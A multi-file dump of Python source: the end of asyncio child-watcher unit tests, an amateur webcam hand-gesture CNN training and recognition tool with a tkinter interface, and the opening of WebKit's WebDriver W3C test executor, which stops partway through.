self.assertTrue(self.WIFEXITED(status)) return status - 32768 def WTERMSIG(self, status): self.assertTrue(self.WIFSIGNALED(status)) return 32768 - status def test_create_watcher(self): self.m_add_signal_handler.assert_called_once_with( signal.SIGCHLD, self.watcher._sig_chld) def waitpid_mocks(func): def wrapped_func(self): def patch(target, wrapper): return mock.patch(target, wraps=wrapper, new_callable=mock.Mock) with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \ patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \ patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \ patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \ patch('os.waitpid', self.waitpid) as m_waitpid: func(self, WaitPidMocks(m_waitpid, m_WIFEXITED, m_WIFSIGNALED, m_WEXITSTATUS, m_WTERMSIG, )) return wrapped_func @waitpid_mocks def test_sigchld(self, m): # register a child callback = mock.Mock() with self.watcher: self.running = True self.watcher.add_child_handler(42, callback, 9, 10, 14) self.assertFalse(callback.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child is running self.watcher._sig_chld() self.assertFalse(callback.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child terminates (returncode 12) self.running = False self.add_zombie(42, 12) self.watcher._sig_chld() self.assertTrue(m.WIFEXITED.called) self.assertTrue(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) callback.assert_called_once_with(42, 12, 9, 10, 14) m.WIFSIGNALED.reset_mock() m.WIFEXITED.reset_mock() m.WEXITSTATUS.reset_mock() callback.reset_mock() # ensure that the child is effectively reaped self.add_zombie(42, 13) with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback.called) self.assertFalse(m.WTERMSIG.called) m.WIFSIGNALED.reset_mock() m.WIFEXITED.reset_mock() m.WEXITSTATUS.reset_mock() # sigchld called again self.zombies.clear() self.watcher._sig_chld() self.assertFalse(callback.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) @waitpid_mocks def test_sigchld_two_children(self, m): callback1 = mock.Mock() callback2 = mock.Mock() # register child 1 with self.watcher: self.running = True self.watcher.add_child_handler(43, callback1, 7, 8) self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # register child 2 with self.watcher: self.watcher.add_child_handler(44, callback2, 147, 18) self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # children are running self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child 1 terminates (signal 3) self.add_zombie(43, -3) self.watcher._sig_chld() callback1.assert_called_once_with(43, -3, 7, 8) self.assertFalse(callback2.called) self.assertTrue(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertTrue(m.WTERMSIG.called) m.WIFSIGNALED.reset_mock() m.WIFEXITED.reset_mock() m.WTERMSIG.reset_mock() callback1.reset_mock() # child 2 still running self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child 2 terminates (code 108) self.add_zombie(44, 108) self.running = False self.watcher._sig_chld() callback2.assert_called_once_with(44, 108, 147, 18) self.assertFalse(callback1.called) self.assertTrue(m.WIFEXITED.called) self.assertTrue(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) m.WIFSIGNALED.reset_mock() m.WIFEXITED.reset_mock() m.WEXITSTATUS.reset_mock() callback2.reset_mock() # ensure that the children are effectively reaped self.add_zombie(43, 14) self.add_zombie(44, 15) with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WTERMSIG.called) m.WIFSIGNALED.reset_mock() m.WIFEXITED.reset_mock() m.WEXITSTATUS.reset_mock() # sigchld called again self.zombies.clear() self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) @waitpid_mocks def test_sigchld_two_children_terminating_together(self, m): callback1 = mock.Mock() callback2 = mock.Mock() # register child 1 with self.watcher: self.running = True self.watcher.add_child_handler(45, callback1, 17, 8) self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # register child 2 with self.watcher: self.watcher.add_child_handler(46, callback2, 1147, 18) self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # children are running self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child 1 terminates (code 78) # child 2 terminates (signal 5) self.add_zombie(45, 78) self.add_zombie(46, -5) self.running = False self.watcher._sig_chld() callback1.assert_called_once_with(45, 78, 17, 8) callback2.assert_called_once_with(46, -5, 1147, 18) self.assertTrue(m.WIFSIGNALED.called) self.assertTrue(m.WIFEXITED.called) self.assertTrue(m.WEXITSTATUS.called) self.assertTrue(m.WTERMSIG.called) m.WIFSIGNALED.reset_mock() m.WIFEXITED.reset_mock() m.WTERMSIG.reset_mock() m.WEXITSTATUS.reset_mock() callback1.reset_mock() callback2.reset_mock() # ensure that the children are effectively reaped self.add_zombie(45, 14) self.add_zombie(46, 15) with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WTERMSIG.called) @waitpid_mocks def test_sigchld_race_condition(self, m): # register a child callback = mock.Mock() with self.watcher: # child terminates before being registered self.add_zombie(50, 4) self.watcher._sig_chld() self.watcher.add_child_handler(50, callback, 1, 12) callback.assert_called_once_with(50, 4, 1, 12) callback.reset_mock() # ensure that the child is effectively reaped self.add_zombie(50, -1) with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback.called) @waitpid_mocks def test_sigchld_replace_handler(self, m): callback1 = mock.Mock() callback2 = mock.Mock() # register a child with self.watcher: self.running = True self.watcher.add_child_handler(51, callback1, 19) self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # register the same child again with self.watcher: self.watcher.add_child_handler(51, callback2, 21) self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child terminates (signal 8) self.running = False self.add_zombie(51, -8) self.watcher._sig_chld() callback2.assert_called_once_with(51, -8, 21) self.assertFalse(callback1.called) self.assertTrue(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertTrue(m.WTERMSIG.called) m.WIFSIGNALED.reset_mock() m.WIFEXITED.reset_mock() m.WTERMSIG.reset_mock() callback2.reset_mock() # ensure that the child is effectively reaped self.add_zombie(51, 13) with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(m.WTERMSIG.called) @waitpid_mocks def test_sigchld_remove_handler(self, m): callback = mock.Mock() # register a child with self.watcher: self.running = True self.watcher.add_child_handler(52, callback, 1984) self.assertFalse(callback.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # unregister the child self.watcher.remove_child_handler(52) self.assertFalse(callback.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child terminates (code 99) self.running = False self.add_zombie(52, 99) with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback.called) @waitpid_mocks def test_sigchld_unknown_status(self, m): callback = mock.Mock() # register a child with self.watcher: self.running = True self.watcher.add_child_handler(53, callback, -19) self.assertFalse(callback.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # terminate with unknown status self.zombies[53] = 1178 self.running = False self.watcher._sig_chld() callback.assert_called_once_with(53, 1178, -19) self.assertTrue(m.WIFEXITED.called) self.assertTrue(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) callback.reset_mock() m.WIFEXITED.reset_mock() m.WIFSIGNALED.reset_mock() # ensure that the child is effectively reaped self.add_zombie(53, 101) with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback.called) @waitpid_mocks def test_remove_child_handler(self, m): callback1 = mock.Mock() callback2 = mock.Mock() callback3 = mock.Mock() # register children with self.watcher: self.running = True self.watcher.add_child_handler(54, callback1, 1) self.watcher.add_child_handler(55, callback2, 2) self.watcher.add_child_handler(56, callback3, 3) # remove child handler 1 self.assertTrue(self.watcher.remove_child_handler(54)) # remove child handler 2 multiple times self.assertTrue(self.watcher.remove_child_handler(55)) self.assertFalse(self.watcher.remove_child_handler(55)) self.assertFalse(self.watcher.remove_child_handler(55)) # all children terminate self.add_zombie(54, 0) self.add_zombie(55, 1) self.add_zombie(56, 2) self.running = False with self.ignore_warnings: self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) callback3.assert_called_once_with(56, 2, 3) @waitpid_mocks def test_sigchld_unhandled_exception(self, m): callback = mock.Mock() # register a child with self.watcher: self.running = True self.watcher.add_child_handler(57, callback) # raise an exception m.waitpid.side_effect = ValueError with mock.patch.object(log.logger, 'error') as m_error: self.assertEqual(self.watcher._sig_chld(), None) self.assertTrue(m_error.called) @waitpid_mocks def test_sigchld_child_reaped_elsewhere(self, m): # register a child callback = mock.Mock() with self.watcher: self.running = True self.watcher.add_child_handler(58, callback) self.assertFalse(callback.called) self.assertFalse(m.WIFEXITED.called) self.assertFalse(m.WIFSIGNALED.called) self.assertFalse(m.WEXITSTATUS.called) self.assertFalse(m.WTERMSIG.called) # child terminates self.running = False self.add_zombie(58, 4) # waitpid is called elsewhere os.waitpid(58, os.WNOHANG) m.waitpid.reset_mock() # sigchld with self.ignore_warnings: self.watcher._sig_chld() if isinstance(self.watcher, asyncio.FastChildWatcher): # here the FastChildWatche enters a deadlock # (there is no way to prevent it) self.assertFalse(callback.called) else: callback.assert_called_once_with(58, 255) @waitpid_mocks def test_sigchld_unknown_pid_during_registration(self, m): # register two children callback1 = mock.Mock() callback2 = mock.Mock() with self.ignore_warnings, self.watcher: self.running = True # child 1 terminates self.add_zombie(591, 7) # an unknown child terminates self.add_zombie(593, 17) self.watcher._sig_chld() self.watcher.add_child_handler(591, callback1) self.watcher.add_child_handler(592, callback2) callback1.assert_called_once_with(591, 7) self.assertFalse(callback2.called) @waitpid_mocks def test_set_loop(self, m): # register a child callback = mock.Mock() with self.watcher: self.running = True self.watcher.add_child_handler(60, callback) # attach a new loop old_loop = self.loop self.loop = self.new_test_loop() patch = mock.patch.object with patch(old_loop, "remove_signal_handler") as m_old_remove, \ patch(self.loop, "add_signal_handler") as m_new_add: self.watcher.attach_loop(self.loop) m_old_remove.assert_called_once_with( signal.SIGCHLD) m_new_add.assert_called_once_with( signal.SIGCHLD, self.watcher._sig_chld) # child terminates self.running = False self.add_zombie(60, 9) self.watcher._sig_chld() callback.assert_called_once_with(60, 9) @waitpid_mocks def test_set_loop_race_condition(self, m): # register 3 children callback1 = mock.Mock() callback2 = mock.Mock() callback3 = mock.Mock() with self.watcher: self.running = True self.watcher.add_child_handler(61, callback1) self.watcher.add_child_handler(62, callback2) self.watcher.add_child_handler(622, callback3) # detach the loop old_loop = self.loop self.loop = None with mock.patch.object( old_loop, "remove_signal_handler") as m_remove_signal_handler: with self.assertWarnsRegex( RuntimeWarning, 'A loop is being detached'): self.watcher.attach_loop(None) m_remove_signal_handler.assert_called_once_with( signal.SIGCHLD) # child 1 & 2 terminate self.add_zombie(61, 11) self.add_zombie(62, -5) # SIGCHLD was not caught self.assertFalse(callback1.called) self.assertFalse(callback2.called) self.assertFalse(callback3.called) # attach a new loop self.loop = self.new_test_loop() with mock.patch.object( self.loop, "add_signal_handler") as m_add_signal_handler: self.watcher.attach_loop(self.loop) m_add_signal_handler.assert_called_once_with( signal.SIGCHLD, self.watcher._sig_chld) callback1.assert_called_once_with(61, 11) # race condition! callback2.assert_called_once_with(62, -5) # race condition! self.assertFalse(callback3.called) callback1.reset_mock() callback2.reset_mock() # child 3 terminates self.running = False self.add_zombie(622, 19) self.watcher._sig_chld() self.assertFalse(callback1.called) self.assertFalse(callback2.called) callback3.assert_called_once_with(622, 19) @waitpid_mocks def test_close(self, m): # register two children callback1 = mock.Mock() with self.watcher: self.running = True # child 1 terminates self.add_zombie(63, 9) # other child terminates self.add_zombie(65, 18) self.watcher._sig_chld() self.watcher.add_child_handler(63, callback1) self.watcher.add_child_handler(64, callback1) self.assertEqual(len(self.watcher._callbacks), 1) if isinstance(self.watcher, asyncio.FastChildWatcher): self.assertEqual(len(self.watcher._zombies), 1) with mock.patch.object( self.loop, "remove_signal_handler") as m_remove_signal_handler: self.watcher.close() m_remove_signal_handler.assert_called_once_with( signal.SIGCHLD) self.assertFalse(self.watcher._callbacks) if isinstance(self.watcher, asyncio.FastChildWatcher): self.assertFalse(self.watcher._zombies) @waitpid_mocks def test_add_child_handler_with_no_loop_attached(self, m): callback = mock.Mock() with self.create_watcher() as watcher: with self.assertRaisesRegex( RuntimeError, 'the child watcher does not have a loop attached'): watcher.add_child_handler(100, callback) class SafeChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase): def create_watcher(self): return asyncio.SafeChildWatcher() class FastChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase): def create_watcher(self): return asyncio.FastChildWatcher() class PolicyTests(unittest.TestCase): def create_policy(self): return asyncio.DefaultEventLoopPolicy() def test_get_child_watcher(self): policy = self.create_policy() self.assertIsNone(policy._watcher) watcher = policy.get_child_watcher() self.assertIsInstance(watcher, asyncio.SafeChildWatcher) self.assertIs(policy._watcher, watcher) self.assertIs(watcher, policy.get_child_watcher()) self.assertIsNone(watcher._loop) def test_get_child_watcher_after_set(self): policy = self.create_policy() watcher = asyncio.FastChildWatcher() policy.set_child_watcher(watcher) self.assertIs(policy._watcher, watcher) self.assertIs(watcher, policy.get_child_watcher()) def test_get_child_watcher_with_mainloop_existing(self): policy = self.create_policy() loop = policy.get_event_loop() self.assertIsNone(policy._watcher) watcher = policy.get_child_watcher() self.assertIsInstance(watcher, asyncio.SafeChildWatcher) self.assertIs(watcher._loop, loop) loop.close() def test_get_child_watcher_thread(self): def f(): policy.set_event_loop(policy.new_event_loop()) self.assertIsInstance(policy.get_event_loop(), asyncio.AbstractEventLoop) watcher = policy.get_child_watcher() self.assertIsInstance(watcher, asyncio.SafeChildWatcher) self.assertIsNone(watcher._loop) policy.get_event_loop().close() policy = self.create_policy() policy.set_child_watcher(asyncio.SafeChildWatcher()) th = threading.Thread(target=f) th.start() th.join() def test_child_watcher_replace_mainloop_existing(self): policy = self.create_policy() loop = policy.get_event_loop() watcher = policy.get_child_watcher() self.assertIs(watcher._loop, loop) new_loop = policy.new_event_loop() policy.set_event_loop(new_loop) self.assertIs(watcher._loop, new_loop) policy.set_event_loop(None) self.assertIs(watcher._loop, None) loop.close() new_loop.close() class TestFunctional(unittest.TestCase): def setUp(self): self.loop = asyncio.new_event_loop() asyncio.set_event_loop(self.loop) def tearDown(self): self.loop.close() asyncio.set_event_loop(None) def test_add_reader_invalid_argument(self): def assert_raises(): return self.assertRaisesRegex(ValueError, r'Invalid file object') cb = lambda: None with assert_raises(): self.loop.add_reader(object(), cb) with assert_raises(): self.loop.add_writer(object(), cb) with assert_raises(): self.loop.remove_reader(object()) with assert_raises(): self.loop.remove_writer(object()) def test_add_reader_or_writer_transport_fd(self): def assert_raises(): return self.assertRaisesRegex( RuntimeError, r'File descriptor .* is used by transport') async def runner(): tr, pr = await self.loop.create_connection( lambda: asyncio.Protocol(), sock=rsock) try: cb = lambda: None with assert_raises(): self.loop.add_reader(rsock, cb) with assert_raises(): self.loop.add_reader(rsock.fileno(), cb) with assert_raises(): self.loop.remove_reader(rsock) with assert_raises(): self.loop.remove_reader(rsock.fileno()) with assert_raises(): self.loop.add_writer(rsock, cb) with assert_raises(): self.loop.add_writer(rsock.fileno(), cb) with assert_raises(): self.loop.remove_writer(rsock) with assert_raises(): self.loop.remove_writer(rsock.fileno()) finally: tr.close() rsock, wsock = socket.socketpair() try: self.loop.run_until_complete(runner()) finally: rsock.close() wsock.close() if __name__ == '__main__': unittest.main()
generate_data.py
import cv2 from time import sleep import os from tkinter import * from keras.utils import plot_model from keras.models import Sequential from keras.layers import Convolution2D, Dropout, Dense, Flatten, MaxPooling2D from keras.preprocessing.image import ImageDataGenerator, load_img from numpy import array from keras import regularizers from keras.models import model_from_json from keras.preprocessing.image import ImageDataGenerator import cv2 import matplotlib.pyplot as plt import matplotlib.animation as animation import numpy as np import threading from matplotlib.pyplot import imshow from keras.preprocessing.image import load_img from keras.preprocessing.image import img_to_array from keras import backend as K import os import pathlib from tkinter import * import tkinter as ttk import shutil import os # define the path def add(): if not os.path.exists("Dataset"):os.mkdir("Dataset") if not os.path.exists("Dataset/training_set"):os.mkdir("Dataset/training_set") if not os.path.exists("Dataset/test_set"):os.mkdir("Dataset/test_set") dirs=[''+close_window()+'/'+close_window()+''] sets={'training_set':10000,'test_set':1000} for set_name in sets: #print("Taking images for the {}. Press enter when ready. ".format(set_name.upper())) ##input() if not os.path.exists("Dataset"):os.mkdir("Dataset/{}".format(set_name)) for dir_name in dirs: #print("""\nTaking images for the {} dataset. Press enter whenever ready. #Note: Place the gesture to be recorded inside the green rectangle shown in the preview until it automatically disappears.""".format(dir_name)) ##input() #for _ in range(3): #print(3-_) #sleep(1) #print("GO!") if not os.path.exists("Dataset/{}/{}".format(set_name,os.path.basename(dir_name))):os.mkdir("Dataset/{}/{}".format(set_name,os.path.basename(dir_name))) vc=cv2.VideoCapture(0) if vc.isOpened(): rval,frame= vc.read() else: rval=False index=0 while rval: input() ##sleep(0.1) frame=frame[200:400,300:500] ##frame = cv2.resize(frame, (200,200)) frame = cv2.cvtColor( frame, cv2.COLOR_RGB2GRAY) frame=frame.reshape((1,)+frame.shape) frame=frame.reshape(frame.shape+(1,)) cv2.destroyWindow("preview") index+=1 rval, frame = vc.read() frame=cv2.flip(frame,1) cv2.putText(frame,"Keep your hand insid", (20,50), cv2.FONT_HERSHEY_PLAIN , 1, 255) cv2.putText(frame,"Taking images for {} dataset".format(dir_name), (20,80), cv2.FONT_HERSHEY_PLAIN , 1, 255) cv2.rectangle(frame,(300,200),(500,400),(0,255,0),1) cv2.imshow("Recording", frame) cv2.imwrite("Dataset/{}/".format(set_name)+str(dir_name)+"{}.jpg".format(index),frame[200:400,300:500]) #save image print("images taken: {}".format(index)) key = cv2.waitKey(20) if key == 27 or index==sets[set_name]: # exit on ESC or when enough images are taken break cv2.destroyWindow("Recording") vc=None def train(): #init the model model= Sequential() #add conv layers and pooling layers model.add(Convolution2D(32,3,3, input_shape=(200,200,1),activation='relu')) model.add(MaxPooling2D(pool_size=(2,2))) model.add(Convolution2D(32,3,3, input_shape=(200,200,1),activation='relu')) model.add(MaxPooling2D(pool_size=(2,2))) model.add(Dropout(0.5)) #to reduce overfitting model.add(Flatten()) #Now two hidden(dense) layers: model.add(Dense(output_dim = 150, activation = 'relu', kernel_regularizer=regularizers.l2(0.01))) model.add(Dropout(0.5))#again for regularization model.add(Dense(output_dim = 150, activation = 'relu', kernel_regularizer=regularizers.l2(0.01))) model.add(Dropout(0.5))#last one lol model.add(Dense(output_dim = 150, activation = 'relu', kernel_regularizer=regularizers.l2(0.01))) #output layer model.add(Dense(output_dim = num(), activation = 'sigmoid')) #Now copile it model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) #Now generate training and test sets from folders train_datagen=ImageDataGenerator( rescale = 1./255, shear_range = 0.2, zoom_range = 0., horizontal_flip = False ) test_datagen=ImageDataGenerator(rescale=1./255) training_set=train_datagen.flow_from_directory(r"C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\training_set", target_size = (200,200), color_mode='grayscale', batch_size=10, class_mode='categorical') test_set=test_datagen.flow_from_directory(r"C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\test_set", target_size = (200,200), color_mode='grayscale', batch_size=10, class_mode='categorical') #finally, start training model.fit_generator(training_set, samples_per_epoch = 19707, nb_epoch = 10, validation_data = test_set, nb_val_samples = 320) #after 10 epochs: #training accuracy: 0.9005 #training loss: 0.4212 #test set accuracy: 0.8813 #test set loss: 0.5387 #saving the weights model.save_weights("weights.hdf5",overwrite=True) #saving the model itself in json format: model_json = model.to_json() with open("model.json", "w") as model_file: model_file.write(model_json) print("Model has been saved.") #testing it to a random image from the test set img = load_img('Dataset/test_set/five/five26.jpg',target_size=(200,200)) x=array(img) img = cv2.cvtColor( x, cv2.COLOR_RGB2GRAY ) img=img.reshape((1,)+img.shape) img=img.reshape(img.shape+(1,)) test_datagen = ImageDataGenerator(rescale=1./255) m=test_datagen.flow(img,batch_size=1) y_pred=model.predict_generator(m,1) #save the model schema in a pic plot_model(model, to_file='model.png', show_shapes = True) histarray={'Empty':0, 'One':0,'Tow':0,'Zero':0} # -*- coding: utf-8 -*- """ Created on Tue Jul 11 18:48:04 2017 @author: Yugal """ histarray={'Empty':0, 'One':0,'Tow':0,'Zero':0} def num(): path=r"C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\training_set" os.chdir(path) list = os.listdir() # dir is your directory path number_files = len(list) return number_files def load_model(): try: json_file = open('model.json', 'r') loaded_model_json = json_file.read() json_file.close() model = model_from_json(loaded_model_json) model.load_weights("weights.hdf5") print("Model successfully loaded from disk.") #compile again model.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy']) return model except: print("""Model not found. Please train the CNN by running the script cnn_train.py. Note that the training and test samples should be properly set up in the dataset directory.""") return None def visualize( img, layer_index=0, filter_index=0 ,all_filters=False ): act_fun = K.function([model.layers[0].input, K.learning_phase()], [model.layers[layer_index].output,]) ##img = load_img('Dataset/test_set/three/70.jpg',target_size=(200,200)) x=img_to_array(img) img = cv2.cvtColor( x, cv2.COLOR_RGB2GRAY ) img=img.reshape(img.shape+(1,)) img=img.reshape((1,)+img.shape) img = act_fun([img,0])[0] if all_filters: fig=plt.figure(figsize=(7,7)) filters = len(img[0,0,0,:]) for i in range(filters): plot = fig.add_subplot(6, 6, i+1) plot.imshow(img[0,:,:,i],'gray') plt.xticks(np.array([])) plt.yticks(np.array([])) plt.tight_layout() else: img = np.rollaxis(img, 3, 1) img=img[0][filter_index] print(img.shape) imshow(img) def update(histarray2): global histarray histarray=histarray2 #realtime: def realtime(): #initialize preview cv2.namedWindow("preview") vc = cv2.VideoCapture(0) if vc.isOpened(): #get the first frame rval, frame = vc.read() else: rval = False classes=["empty","one","tow","zero"] while rval: frame=cv2.flip(frame,1) cv2.rectangle(frame,(300,200),(500,400),(0,255,0),1) cv2.putText(frame,"Place your hand in the green box.", (50,50), cv2.FONT_HERSHEY_PLAIN , 1, 255) cv2.putText(frame,"Press esc to exit.", (50,100), cv2.FONT_HERSHEY_PLAIN , 1, 255) cv2.imshow("preview", frame) frame=frame[200:400,300:500] #frame = cv2.resize(frame, (200,200)) frame = cv2.cvtColor( frame, cv2.COLOR_RGB2GRAY) frame=frame.reshape((1,)+frame.shape) frame=frame.reshape(frame.shape+(1,)) test_datagen = ImageDataGenerator(rescale=1./255) m=test_datagen.flow(frame,batch_size=1) y_pred=model.predict_generator(m,1) histarray2={'Empty': y_pred[0][0], 'One': y_pred[0][1],'Three': y_pred[0][2],'Zero': y_pred[0][3]} update(histarray2) print(classes[list(y_pred[0]).index(y_pred[0].max())]) rval, frame = vc.read() key = cv2.waitKey(20) if key == 27: # exit on ESC break cv2.destroyWindow("preview") vc=None #loading the model model=load_model() #visualize(load_img('Dataset/test_set/zero/zero1.jpg',target_size=(200,200)),filter_index=0,all_filters=True) #if model is not None: #ans=str(input("Do you want to plot a realtime histogram as well? (slower) y/n\n")) #if ans.lower()=='y': #the code for histogram # fig = plt.figure() # ax1 = fig.add_subplot(1, 1, 1) # def animate(i): # xar= [1, 2, 3, 4 ,5 ,6,7] # yar = [] # xtitles = [''] # for items in histarray: # yar.append(histarray[items]) # xtitles.append(items) # #ax1.clear() #plt.bar(xar,yar, align='center') #plt.xticks(np.arange(8), xtitles) #ani = animation.FuncAnimation(fig, animate, interval=500) #fig.show() #threading.Thread(target=realtime).start() #realtime() def close_window(): global entry entry = nete2.get() return entry root=Tk() print("") Label= Label(root ,text="Enter the name of a new gesture") Label.grid(row=0,column=0) nete2=Entry(root) nete2.grid(row=1,column=0) currentDirectory = pathlib.Path(r'C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\training_set') v=[] for currentFile in currentDirectory.iterdir(): print(currentFile) v.append(currentFile) variable = StringVar(root) variable.set("Select a gesture you want to delete") # default value global w w= OptionMenu(root,variable , *v) w.grid(row =3) def printt(): global m m=variable.get() print(m) def delete(): shutil.rmtree(variable.get()) but3=Button(root,text='delete',fg='red',command=delete) but3.grid(row=3,column=1) but=Button(root,text='add',fg='red',command=add) but.grid(row=1,column=1) but1=Button(root,text='retrain',fg='red',command=train) but1.grid(row=4) but2=Button(root,text='test',fg='red',command=realtime) but2.grid(row=5) root.mainloop()
webdriver_w3c_executor.py
# Copyright (C) 2017 Igalia S.L. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import logging import os import json import sys from multiprocessing import Process, Queue from webkitpy.common.system.filesystem import FileSystem from webkitpy.common.webkit_finder import WebKitFinder import webkitpy.thirdparty.autoinstalled.mozlog import webkitpy.thirdparty.autoinstalled.mozprocess from mozlog import structuredlog w3c_tools_dir = WebKitFinder(FileSystem()).path_from_webkit_base('WebDriverTests', 'imported', 'w3c', 'tools') def _ensure_directory_in_path(directory): if not directory in sys.path: sys.path.insert(0, directory) _ensure_directory_in_path(os.path.join(w3c_tools_dir, 'webdriver')) _ensure_directory_in_path(os.path.join(w3c_tools_dir, 'wptrunner')) from wptrunner.executors.base import WdspecExecutor, WebDriverProtocol from wptrunner.webdriver_server import WebDriverServer pytest_runner = None def do_delayed_imports(): global pytest_runner import webkitpy.webdriver_tests.pytest_runner as pytest_runner _log = logging.getLogger(__name__) class MessageLogger(object): def __init__(self, message_func): self.name = 'WebKit WebDriver WPT logger' self.send_message = message_func def _log_data(self, action, **kwargs): self.send_message('log', action, kwargs) def process_output(self, process, data, command): self._log_data('process_output', process=process, data=data, command=command) class TestRunner(object): def __init__(self): self.logger = MessageLogger(self.send_message) structuredlog.set_default_logger(self.logger) def send_message(self, command, *args): if command == 'log': self._log(*args) def _log(self, level, details): if level == 'process_output': self._process_output(details['process'], details['command'], details['data']) return if not 'message' in details: return message = details['message'] if level == 'info': _log.info(message) elif level == 'debug': _log.debug(message) elif level == 'error': _log.error(message) elif level == 'criticial': _log.critical(message) elif level == 'warning': 